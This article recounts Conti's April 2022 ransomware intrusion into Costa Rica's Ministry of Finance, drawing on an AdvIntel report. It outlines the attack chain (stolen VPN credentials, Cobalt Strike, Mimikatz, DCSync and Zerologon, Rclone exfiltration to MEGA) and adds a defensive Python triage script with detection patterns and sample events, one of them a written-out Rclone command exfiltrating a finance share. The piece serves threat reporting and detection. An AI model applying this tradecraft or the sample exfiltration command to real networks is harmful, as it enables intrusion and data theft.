- Conti started its attack on the Costa Rican government on the 11th of April.
- The initial attack vector was compromised credential access via VPN.
- The president of Costa Rica declared a state of emergency and claimed that traitors helped hackers during the attacks.
The Conti ransomware group, which emerged in 2020, gained significant notoriety with its successful attacks on the Costa Rican government. It was also the group's last attack before it evolved into a new structure and started working with other gangs. Before the Costa Rica attack, organizations from both the private and public sectors had already fallen victim to the group.
5-day intrusion
Conti started its attack on the Costa Rican government on the 11th of April. The group used a system belonging to Costa Rica's Ministry of Finance as the entry point. A member, named MemberX, gained access through a VPN connection using compromised credentials. According to the report published by AdvIntel, in the early stages of the attack the group set up over 10 Cobalt Strike beacons. The initial attack vector for this operation was therefore compromised credential access via VPN.
Name: Ministerio de Hacienda Costa Rica
Domain: hacienda.go.cr
Threat Actor Name: MemberX
Date(s): April 11, 2022
Timeline of Exploitation Operation: April 11, 2022 to April 15, 2022
According to the report, the group used the following methods:
- The infection followed a typical attack flow wherein the adversaries gained access from the compromised VPN log by installing a crypted form of Cobalt Strike inside the Costa Rica sub-network.
- The adversaries obtained local network domain administrator and enterprise administrator recon.
- The threat actors then performed network reconnaissance via Nltest domain trust enumeration, before scanning the network for file shares by leveraging the ShareFinder utility and AdFind from C:\ProgramData.
- The adversary (referenced by internal pseudonym “MemberX”) downloaded the fileshare output on their local machine via the Cobalt Strike channel.
- Then, the adversaries leveraged Cobalt Strike’s Mimikatz to dump logon passwords and NTDS hashes of the local machine users, obtaining plaintext and brute-forceable local admin, domain, and enterprise administrator hashes.
- The adversaries leveraged the enterprise user credentials to perform a DCSync and Zerologon attack. This effectively gained them access to every host on the Costa Rica interconnected networks.
- The adversaries then uploaded MSI scripts with the Atera Remote Management Tool (RMM) to remote hosts, selecting those with local admin access and less user activity. This established "anchoring" and a safe return in case the threat actors' beacons were burned or detected by the well-known EDR tool utilized by Costa Rica.
- The adversaries pinged the whole network and re-scanned the network domain trusts, leveraging enterprise administrator credentials with ShareFinder and compiling a list of all corporate assets and databases available under their new elevated privileges.
- On several network hosts, the adversaries also created a Rclone configuration file, which their data exfiltration tool leveraged as input with the MEGA Share uploader. They then began exfiltration from the network.
- The adversaries uploaded Process Hacker, Power Tools, and Do Not Sleep tools, and batch scripts filled in with the fileshare access locations.
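Several steps in the report's attack flow leave distinctive host and domain-controller telemetry: Nltest trust enumeration, AdFind/ShareFinder run out of C:\ProgramData, an MSI install of the Atera agent, Rclone pushing data to a MEGA remote, and a DCSync replication request from an account that is not a domain controller. The following is an added triage example written for this page; it is not code from the original article or from AdvIntel. It runs simple rules over constructed Sysmon EventID 1 (process creation) and Windows Security EventID 4662 (AD object access) records; the host names, account names and command lines are invented for the demonstration, the MITRE technique IDs are standard mappings, and the two replication-right GUIDs are the well-known DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights.

```python
"""Triage rules for the Conti-style tradecraft described in the report.

Added example, not part of the original page or the AdvIntel report.
Records below are constructed Sysmon/Security events in simplified dict
form; field names follow Sysmon EventID 1 and Security EventID 4662, but
the values (hosts, accounts, paths) are invented for this demonstration.
"""
import re

# Well-known extended-right GUIDs requested during DCSync-style replication.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"


def is_dc_account(name):
    """Domain controllers replicate with their machine account (name ends in '$')."""
    return name.endswith("$")


PROCESS_RULES = [
    # (rule name, regex over lower-cased "<Image> <CommandLine>", MITRE technique)
    ("nltest domain trust enumeration", r"nltest(\.exe)?\s+/domain_trusts", "T1482"),
    ("AdFind/ShareFinder staged in ProgramData", r"c:\\programdata\\.*(adfind|sharefinder)", "T1087.002/T1135"),
    ("Rclone with MEGA remote", r"rclone(\.exe)?\s+.*\b(copy|sync|move)\b.*\bmega", "T1567.002"),
    ("Atera agent MSI install", r"msiexec(\.exe)?\s+.*ateraagent.*\.msi", "T1219"),
]


def score_process_event(ev):
    """Return the (rule name, technique) pairs matching a Sysmon EventID 1 record."""
    text = f"{ev.get('Image', '')} {ev.get('CommandLine', '')}".lower()
    return [(name, tech) for name, pat, tech in PROCESS_RULES if re.search(pat, text)]


def is_dcsync(ev):
    """Security 4662: replication rights requested by an account that is not a DC."""
    if ev.get("EventID") != 4662:
        return False
    props = ev.get("Properties", "").lower()
    if DS_REPLICATION_GET_CHANGES not in props and DS_REPLICATION_GET_CHANGES_ALL not in props:
        return False
    return not is_dc_account(ev.get("SubjectUserName", ""))


def triage(events):
    """Run all rules over a list of events; return (alert text, host) tuples."""
    alerts = []
    for ev in events:
        host = ev.get("Computer", "?")
        if ev.get("EventID") == 1:
            for name, tech in score_process_event(ev):
                alerts.append((f"{name} [{tech}]", host))
        elif is_dcsync(ev):
            alerts.append(("DCSync replication request by non-DC account [T1003.006]", host))
    return alerts


# Constructed sample telemetry (invented hosts and accounts, not real logs).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "FIN-WS01", "Image": "C:\\Windows\\System32\\nltest.exe",
     "CommandLine": "nltest /domain_trusts /all_trusts"},
    {"EventID": 1, "Computer": "FIN-WS01", "Image": "C:\\ProgramData\\AdFind.exe",
     "CommandLine": "AdFind.exe -f objectcategory=computer"},
    {"EventID": 1, "Computer": "FIN-SRV02", "Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "msiexec /i C:\\Users\\Public\\AteraAgent.msi /qn"},
    {"EventID": 1, "Computer": "FIN-SRV03", "Image": "C:\\ProgramData\\rclone.exe",
     "CommandLine": "rclone.exe copy \\\\fileserver\\finance mega:backup --config C:\\ProgramData\\rclone.conf"},
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "DC02$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},  # legitimate DC-to-DC replication
    {"EventID": 1, "Computer": "FIN-WS09", "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},  # benign activity, should not alert
]

if __name__ == "__main__":
    for alert, host in triage(SAMPLE_EVENTS):
        print(f"{host}: {alert}")
```

Run as-is it prints five alerts and stays silent on the DC-to-DC replication and the notepad event. The 4662 rule is the one worth tuning in a real environment: it must suppress machine accounts of actual domain controllers and any legitimate replication service accounts (Azure AD Connect is the usual one), since otherwise the rule fires on normal directory synchronization.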
The attacks caused Rodrigo Chaves Robles, the President of Costa Rica, to declare a state of national emergency due to the cyber attacks. He called them an act of terrorism and stated that the country was in a state of war, and that there was evidence that people were helping Conti from within Costa Rica. AdvIntel said,
« Given that the Costa Rican attacks were done partially as a form of symbolic closure for the Conti syndicate, this decision to stick with the toolkit that the group was renowned for feels intentional on the part of the threat actors; the anatomy of these hacks, as seen with the Ministry of Finance, was unmistakably in Conti's signature attack style.
The notability and recognizability in Conti's attack style also ultimately contributed to the group's downfall, however. As Conti honed their attack methodology to a high degree of proficiency, defense and security agencies began to catch on to the distinctive Conti method of operations and develop mitigations for them. This is a contributing factor to the rise of more adaptive and personalized tactics being utilized by Conti's successors, such as social engineering and complex phishing schemes. »